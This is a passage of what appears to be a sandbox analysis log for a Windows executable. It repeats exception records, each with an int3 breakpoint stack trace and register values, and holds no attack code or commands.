an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1622112 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1622444 registers.edx: 1622468 registers.ebx: 1622468 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1620552 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1620884 registers.edx: 1620908 registers.ebx: 1620908 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1618992 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1619324 registers.edx: 1619348 registers.ebx: 1619348 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1617432 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1617764 registers.edx: 1617788 registers.ebx: 1617788 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1615872 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1616204 registers.edx: 1616228 registers.ebx: 1616228 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1614312 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1614644 registers.edx: 1614668 registers.ebx: 1614668 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1612752 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1613084 registers.edx: 1613108 registers.ebx: 1613108 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1611192 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1611524 registers.edx: 1611548 registers.ebx: 1611548 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1609632 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1609964 registers.edx: 1609988 registers.ebx: 1609988 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1608072 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1608404 registers.edx: 1608428 registers.ebx: 1608428 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1606512 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1606844 registers.edx: 1606868 registers.ebx: 1606868 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 